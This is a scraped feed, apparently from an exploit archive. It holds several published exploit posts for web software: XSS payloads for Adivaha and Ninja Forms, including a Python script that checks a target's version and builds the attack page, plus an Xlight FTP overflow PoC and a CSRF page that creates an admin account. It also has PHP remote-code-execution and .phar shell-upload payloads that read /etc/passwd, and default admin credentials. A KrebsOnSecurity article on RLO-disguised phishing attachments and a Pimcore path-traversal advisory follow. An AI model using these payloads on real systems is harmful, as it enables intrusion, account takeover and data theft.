WordPress Adivaha Travel plugin version 2.3 suffers from a cross site scripting vulnerability.

    # Exploit Title: WordPress adivaha Travel Plugin 2.3 - Reflected XSS# Exploit Author: CraCkEr# Date: 29/07/2023# Vendor: adivaha - Travel Tech Company# Vendor Homepage: https://www.adivaha.com/# Software Link: https://wordpress.org/plugins/adiaha-hotel/# Demo: https://www.adivaha.com/demo/adivaha-online/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site ## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /mobile-app/v3/GET parameter 'isMobile' is vulnerable to XSShttps://www.website/mobile-app/v3/?pid=77A89299&isMobile=[XSS]XSS Payload: clq95"><script>alert(1)</script>lb1ra[-] Done

WordPress Adivaha Travel 2.3 Cross Site Scripting

Xlight FTP Server version 3.9.3.6 suffers from a stack buffer overflow vulnerability.

    # Exploit Title: Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)# Discovered by: Yehia Elghaly# Discovered Date: 2023-08-04# Vendor Homepage: https://www.xlightftpd.com/# Software Link : https://www.xlightftpd.com/download/setup.exe# Tested Version: 3.9.3.6# Vulnerability Type: Buffer Overflow Local# Tested on OS: Windows XP Professional SP3 - Windows 11 x64# Description: Xlight FTP Server 3.9.3.6 'Execute Program' Buffer Overflow (PoC)# Steps to reproduce:# 1. - Download and Xlight FTP Server# 2. - Run the python script and it will create exploit.txt file.# 3. - Open Xlight FTP Server 3.9.3.6# 4. - "File and Directory - Modify Virtual Server Configuration - Advanced - Misc- Setup # 6. - Execute a Program after use logged in-  Paste the characters # 7  - Crashed#!/usr/bin/env python3exploit = 'A' * 294try:     with open("exploit.txt","w") as file:        file.write(exploit)    print("POC is created")except:    print("POC not created")

Xlight FTP Server 3.9.3.6 Stack Buffer Overflow

WordPress Ninja Forms plugin version 3.6.25 suffers from a cross site scripting vulnerability.

# Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated)# Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt# Date: 2023-07-27# Exploit Author: Mehran Seifalinia# Vendor Homepage: https://ninjaforms.com/# Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip# Version: 3.6.25# Tested on: Windows 10# CVE: CVE-2023-37979from requests import getfrom sys import argvfrom os import getcwdimport webbrowserfrom time import sleep# Values:url = argv[-1]if url[-1] == "/":    url = url.rstrip("/")# ConstantsCVE_NAME = "CVE-2023-37979"VULNERABLE_VERSION = "3.6.25"  # HTML templateHTML_TEMPLATE = f"""<!DOCTYPE html><html><head>  <title>{CVE_NAME}</title>  <style>    body {{      font-family: Arial, sans-serif;      background-color: #f7f7f7;      color: #333;      margin: 0;      padding: 0;    }}    header {{      background-color: #4CAF50;      padding: 10px;      text-align: center;      color: white;      font-size: 24px;    }}    .cool-button {{      background-color: #007bff;      color: white;      padding: 10px 20px;      border: none;      cursor: pointer;      font-size: 16px;      border-radius: 4px;    }}    .cool-button:hover {{      background-color: #0056b3;    }}  </style></head><body>  <header>  Ninja-forms reflected XSS ({CVE_NAME})</br>    Created by Mehran Seifalinia  </header>  <div style="padding: 20px;">    <form action="{url}/wp-admin/admin-ajax.php" method="POST">      <input type="hidden" name="action" value="nf_batch_process" />      <input type="hidden" name="batch_type" value="import_form_template" />      <input type="hidden" name="security" value="e29f2d8dca" />      <input type="hidden" name="extraData[template]" value="formtemplate-contactformd" />      <input type="hidden" name="method_override" value="_respond" />      <input type="hidden" name="data" value="Mehran"}}<img src=Seifalinia onerror=alert(String.fromCharCode(78,105,110,106,97,45,102,111,114,109,115,32,114,101,102,108,101,99,116,101,100,32,88,83,83,10,67,86,69,45,50,48,50,51,45,51,55,57,55,57,10,45,77,101,104,114,97,110,32,83,101,105,102,97,108,105,110,105,97,45))>" />      <input type="submit" class="cool-button" value="Click here to Execute XSS" />    </form>  </div>  <div style="background-color:red;color:white;padding:1%;">After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.</div>  <footer>  <a href="https://github.com/Mehran-Seifalinia">Github</a>  </br>  <a href="https://www.linkedin.com/in/mehran-seifalinia-63577a1b6/?originalSubdomain=ir">LinkedIn</a  </footer></body></html>"""def exploit():    with open(f"{CVE_NAME}.html", "w") as poc:        poc.write(HTML_TEMPLATE)        print(f"[@] POC Generated at {getcwd()}\{CVE_NAME}.html")        print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")        sleep(2)        webbrowser.open(f"{getcwd()}\{CVE_NAME}.html")# Check if the vulnerable version is installeddef check_CVE():    try:        response = get(url + "/wp-content/plugins/ninja-forms/readme.txt")        if response.status_code != 200 or not("Ninja Forms" in response.text):            print("[!] Ninja-forms plugin has not installed on this site.")            return False        else:            version = response.text.split("Stable tag:")[1].split("License")[0].split()[0]            main_version = int(version.split(".")[0])            partial_version = int(version.split(".")[1])            final_version = int(version.split(".")[2])            if (main_version < 3) or (main_version == 3 and partial_version < 6) or (main_version == 3 and partial_version == 6 and final_version <= 25):                print(f"[*] Vulnerable Nonja-forms version {version} detected!")                return True            else:                print(f"[!] Nonja-forms version {version} is not vulnerable!")                return False    except Exception as error:        print(f"[!] Error: {error}")        exit()# Check syntax of the scriptdef check_script():    usage = f"""Usage: {argv[0].split("/")[-1].split("/")[-1]} [OPTIONS] [TARGET]    OPTIONS:        --exploit:  Open a browser and execute the vulnerability.    TARGET:        An URL starts with 'http://' or 'https://'Examples:    > {argv[0].split("/")[-1]} https://vulnsite.com    > {argv[0].split("/")[-1]} --exploit https://vulnsite.com"""    try:        if len(argv) < 2 or len(argv) > 3:            print("[!] Syntax error...")            print(usage)            exit()        elif not url.startswith(tuple(["http://", "https://"])):            print("[!] Invalid target...\n\tTarget most starts with 'http://' or 'https://'")            exit()        else:            for arg in argv:                if arg == argv[0]:                    print("[*]Starting the script >>>")                    state = check_CVE()                    if state == False:                        exit()                elif arg.lower() == "--exploit":                    exploit()                elif arg == url:                    continue                else:                    print(f"[!] What the heck is '{arg}' in the command?")    except Exception as error:        print(f"[!] Error: {error}")        exit()if __name__ == "__main__":    check_script()

WordPress Ninja Forms 3.6.25 Cross Site Scripting

COURIER DEPRIXA version 2.5 suffers from a cross site request forgery vulnerability.

====================================================================================================================================| # Title     : COURIER DEPRIXA V2.5 CSRF Vulnerability                                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://www.themeslide.com/courier-deprixa-logistics-worldwide-v2-5/                                               |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] Go to the line 5.[+] Set the target site link Save changes and apply . [+] infected file : /deprixa/settings/addusersadmin/agregar.php[+] save code as poc.html [+]  <h4 class="modal-title" id="myModalLabel"><i class="fa fa-user-plus"></i> New Administrator</h4>                          </div>                          <div class="modal-body">                                                      <form action="https://127.0.0.1/galaxyexpressuaecom/deprixa/settings/addusersadmin/agregar.php"  class="form-horizontal" method="post">                              <div class="form-group " id="gnombrepa">                              <label for="off_name" class="col-sm-2 control-label">Name</label>                              <div class="col-sm-10">                                <input type="text" class="form-control off_name" name="name_parson"  placeholder="Name Administrator ">                              </div>                              </div>                              <div class="form-group" id="gapellido">                              <label for="email" class="col-sm-2 control-label">Email </label>                              <div class="col-sm-5">                                <input type="text" class="form-control email" name="email"   placeholder="Email ">                              </div>                              <div class="col-sm-5">                                <input class="form-control phone" name="phone" placeholder="Phone">                                                                    </div>                              </div>                              <div class="form-group" id="gemail">                              <label for="office" class="col-sm-2 control-label">Office</label>                              <div class="col-sm-5">                                <input type="text" class="form-control office" name="office"  placeholder="Office ">                              </div>                              <div class="col-sm-5">                              <select type="text" class="form-control role" name="role" >                                <option value="Administrator">Administrator</option>                                                    </select>                              </div>                              </div>                              <div class="form-group " id="gnombre">                              <label for="off_name" class="col-sm-2 control-label">User</label>                              <div class="col-sm-10">                                <input type="text" class="form-control off_name" name="name"  placeholder="User">                              </div>                              </div>                              <div class="form-group" id="gpassword">                              <label for="pwd" class="col-sm-2 control-label">Password</label>                              <div class="col-sm-10">                                <input type="text" class="form-control pwd" name="pwd"  placeholder="Password">                              </div>                              </div>                              <div class="form-group">                              <div class="col-sm-offset-2 col-sm-10">                                <div class="checkbox checkbox-success">                                  <input id="checkbox3" type="checkbox" name="estado" value="1" checked>                                  <label for="checkbox3">                                    Status                                  </label>                                </div>                                <div class="checkbox checkbox-inline" >                                  <input type="checkbox"  name="type" value="a" onclick="return false" checked>                                  <label for="inlineCheckbox3"> Type of user </label>                                </div>                              </div>                              </div>                                                          </div>                            <div class="modal-footer">                              <button type="button" class="btn btn-default" data-dismiss="modal"><i class="fa fa-times"></i>                                Close</button>                              <input class="btn btn-success" name="Submit" type="submit"  id="submit" value="Save">                            </div>                          </form>                                                      </div>                        </div>                      </div>                      <!--fin de moGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

COURIER DEPRIXA 2.5 Cross Site Request Forgery

Webedition CMS version 2.9.8.8 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: Webedition CMS v2.9.8.8 - Stored XSSApplication: Webedition CMSVersion: v2.9.8.8   Bugs:  Stored XssTechnology: PHPVendor URL: https://www.webedition.org/Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1Date of found: 03.08.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps1. Login to account2. Go to New ->  Media -> Image3. Upload malicious svg file svg file content:"""<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>"""Poc request:POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=&we_cmd[2]=&we_cmd[3]=&we_cmd[4]=&we_cmd[5]=&we_cmd[6]= HTTP/1.1Host: localhostContent-Length: 761Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=73fee01822cc1e1b9ae2d7974583bb8eAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300Connection: closewe_transaction=73fee01822cc1e1b9ae2d7974583bb8e&we_cea6f7e60ce62be78e59f849855d2038_Filename=malas&we_cea6f7e60ce62be78e59f849855d2038_Extension=.svg&wetmp_we_cea6f7e60ce62be78e59f849855d2038_Extension=&we_cea6f7e60ce62be78e59f849855d2038_ParentPath=%2F&we_cea6f7e60ce62be78e59f849855d2038_ParentID=0&yuiAcContentTypeParentPath=&we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&check_we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&we_cea6f7e60ce62be78e59f849855d2038_IsProtected=0&fold%5B0%5D=0&fold_named%5BPropertyPage_2%5D=0&fold%5B1%5D=0&fold_named%5BPropertyPage_3%5D=0&wetmp_cea6f7e60ce62be78e59f849855d2038_CreatorID=%2Fadmin&we_cea6f7e60ce62be78e59f849855d2038_CreatorID=1&we_cea6f7e60ce62be78e59f849855d2038_RestrictOwners=0&we_complete_request=1

Webedition CMS 2.9.8.8 Cross Site Scripting

Webedition CMS version 2.9.8.8 suffers from a remote code execution vulnerability.

    Exploit Title: Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)Application: webedition CmsVersion: v2.9.8.8   Bugs:  RCETechnology: PHPVendor URL: https://www.webedition.org/Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1Date of found: 03.08.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps1. Login account2. Go to New -> Webedition page -> empty page3. Select php4. Set as "><?php echo system("cat /etc/passwd");?>  Description areaPoc request: POST /webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd HTTP/1.1Host: localhostContent-Length: 1621Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0ddAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300Connection: closewe_transaction=4fd880c06df5a590754ce5b8738cd0dd&we_003be033b474a5c25132d388906fb4ae_Filename=poc&we_003be033b474a5c25132d388906fb4ae_Extension=.php&wetmp_we_003be033b474a5c25132d388906fb4ae_Extension=&we_003be033b474a5c25132d388906fb4ae_ParentPath=%2F&we_003be033b474a5c25132d388906fb4ae_ParentID=0&yuiAcContentTypeParentPath=&we_003be033b474a5c25132d388906fb4ae_DocType=&we_003be033b474a5c25132d388906fb4ae_TemplateName=%2F&we_003be033b474a5c25132d388906fb4ae_TemplateID=&yuiAcContentTypeTemplate=&we_003be033b474a5c25132d388906fb4ae_IsDynamic=0&we_003be033b474a5c25132d388906fb4ae_IsSearchable=0&we_003be033b474a5c25132d388906fb4ae_InGlossar=0&we_003be033b474a5c25132d388906fb4ae_txt%5BTitle%5D=asdf&we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D=%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E&we_003be033b474a5c25132d388906fb4ae_txt%5BKeywords%5D=asdf&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_003be033b474a5c25132d388906fb4ae_Language=en_GB&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Bde_DE%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Ben_GB%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_003be033b474a5c25132d388906fb4ae_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_003be033b474a5c25132d388906fb4ae_CreatorID=%2Fadmin&we_003be033b474a5c25132d388906fb4ae_CreatorID=1&we_003be033b474a5c25132d388906fb4ae_RestrictOwners=0&we_complete_request=1

Webedition CMS 2.9.8.8 Remote Code Execution

Webutler version 3.2 suffers from a remote shell upload vulnerability.

    Exploit Title: Webutler v3.2 - Remote Code Execution (RCE)Application: webutler CmsVersion: v3.2Bugs:  RCETechnology: PHPVendor URL: https://webutler.de/enSoftware Link: http://webutler.de/download/webutler_v3.2.zipDate of found: 03.08.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. login to account as admin2. go to visit media 3.upload phar file4. upload poc.phar filepoc.phar file contents :<?php echo system("cat /etc/passwd");?>5. Visit to poc.phar filepoc request:POST /webutler_v3.2/admin/browser/index.php?upload=newfile&types=file&actualfolder=%2F&filename=poc.phar&overwrite=true HTTP/1.1Host: localhostContent-Length: 40sec-ch-ua: sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36X_FILENAME: poc.pharsec-ch-ua-platform: ""Accept: */*Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/webutler_v3.2/admin/browser/index.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: WEBUTLER=ekgfsfhi3ocqdvv7ukqoropoluConnection: close<?php echo system("cat /etc/passwd");?>

Webutler 3.2 Shell Upload

Videoplay version 1.3.0 appears to leave default credentials installed after installation.

    ======================================================================================================================================| # Title     : Videoplay V1.3.0 Insecure Settings Vulnerability                                                                     || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                               || # Vendor    : https://codecanyon.net/                                                                                              |  | # Dork      : VideoPlay - The best video subscription platform                                                                     |======================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] Use Admin : admin@coffeetheme.com & Pass : password[+] https://videoswebguyzdashboardcom/dashboard/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Videoplay 1.3.0 Insecure Settings

One frustrating aspect of email phishing is the frequency with which scammers fall back on tried-and-true methods that really have no business working these days. Like attaching a phishing email to a traditional, clean email message, or leveraging link redirects on LinkedIn, or abusing an encoding method that makes it easy to disguise booby-trapped Microsoft Windows files as relatively harmless documents.

One frustrating aspect of email phishing is the frequency with which scammers fall back on tried-and-true methods that really have no business working these days. Like attaching a phishing email to a traditional, clean email message, or leveraging link redirects on **LinkedIn**, or abusing an encoding method that makes it easy to disguise booby-trapped **Microsoft Windows** files as relatively harmless documents.

KrebsOnSecurity recently heard from a reader who was puzzled over an email he’d just received saying he needed to review and complete a supplied W-9 tax form. The missive was made to appear as if it were part of a mailbox delivery report from **Microsoft 365** about messages that had failed to deliver.

The reader, who asked to remain anonymous, said the phishing message contained an attachment that appeared to have a file extension of “.pdf,” but something about it seemed off. For example, when he downloaded and tried to rename the file, the right arrow key on the keyboard moved his cursor to the left, and vice versa.

The file included in this phishing scam uses what’s known as a “right-to-left override” or RLO character. RLO is a special character within unicode — an encoding system that allows computers to exchange information regardless of the language used — that supports languages written from right to left, such as Arabic and Hebrew.

Look carefully at the screenshot below and you’ll notice that while Microsoft Windows says the file attached to the phishing message is named “lme.pdf,” the full filename is “fdp.eml” spelled backwards. In essence, this is a .eml file — an electronic mail format or email saved in plain text — masquerading as a .PDF file.

“The email came through Microsoft Office 365 with all the detections turned on and was not caught,” the reader continued. “When the same email is sent through Mimecast, Mimecast is smart enough to detect the encoding and it renames the attachment to ‘\_\_\_fdp.eml.’ One would think Microsoft would have had plenty of time by now to address this.”

Indeed, KrebsOnSecurity first covered RLO-based phishing attacks back in 2011, and even then it wasn’t a new trick.

Opening the .eml file generates a rendering of a webpage that mimics an alert from Microsoft about wayward messages awaiting restoration to your inbox. Clicking on the “Restore Messages” link there bounces you through an open redirect on **LinkedIn** before forwarding to the phishing webpage.

As noted here last year, scammers have long taken advantage of a marketing feature on the business networking site which lets them create a LinkedIn.com link that bounces your browser to other websites, such as phishing pages that mimic top online brands (but chiefly Linkedin’s parent firm Microsoft).

The landing page after the LinkedIn redirect displays what appears to be an Office 365 login page, which is naturally a phishing website made to look like an official Microsoft Office property.

In summary, this phishing scam uses an old RLO trick to fool Microsoft Windows into thinking the attached file is something else, and when clicked the link uses an open redirect on a Microsoft-owned website (LinkedIn) to send people to a phishing page that spoofs Microsoft and tries to steal customer email credentials.

According to the latest figures from **Check Point Software**, Microsoft was by far the most impersonated brand for phishing scams in the second quarter of 2023, accounting for nearly 30 percent of all brand phishing attempts.

An unsolicited message that arrives with one of these .eml files as an attachment is more than likely to be a phishing lure. The best advice to sidestep phishing scams is to avoid clicking on links that arrive unbidden in emails, text messages and other mediums. Most phishing scams invoke a temporal element that warns of dire consequences should you fail to respond or act quickly.

If you’re unsure whether a message is legitimate, take a deep breath and visit the site or service in question manually — ideally, using a browser bookmark to avoid potential typosquatting sites.

Teach a Man to Phish and He’s Set for Life

Pimcore is an Open Source Data & Experience Management Platform: PIM, MDM, CDP, DAM, DXP/CMS & Digital Commerce. A path traversal vulnerability exists in the `AssetController::importServerFilesAction`, which allows an attacker to overwrite or modify sensitive files by manipulating the pimcore_log parameter.This can lead to potential denial of service---key file overwrite.
The impact of this vulnerability allows attackers to: overwrite or modify sensitive files, potentially leading to unauthorized access, privilege escalation, or disclosure of confidential information. This could also cause a denial of service (DoS) if critical system files are overwritten or deleted.

**Impact**

A path traversal vulnerability exists in the AssetController::importServerFilesAction, which allows an attacker to overwrite or modify sensitive files by manipulating the pimcore\_log parameter.This can lead to potential denial of service---key file overwrite.

The impact of this vulnerability allows attackers to:

Overwrite or modify sensitive files, potentially leading to unauthorized access, privilege escalation, or disclosure of confidential information.

Tamper with system settings by modifying key files, such as the hosts file in Windows or configuration files for other services.

Cause a denial of service (DoS) if critical system files are overwritten or deleted.

The consequences of exploiting this vulnerability can be detrimental to the confidentiality, integrity, and availability of the affected system. It's crucial to address this vulnerability to protect sensitive data and ensure the proper functioning of the system.

**Patches**

Update to version 10.6.7 or apply this patch manually https://github.com/pimcore/pimcore/commit/58012d0e3b8b926fb54eccbd64ec5c993b30c22c.patch

**Workarounds**

Apply patch https://github.com/pimcore/pimcore/commit/58012d0e3b8b926fb54eccbd64ec5c993b30c22c.patch manually.

Tag

#windows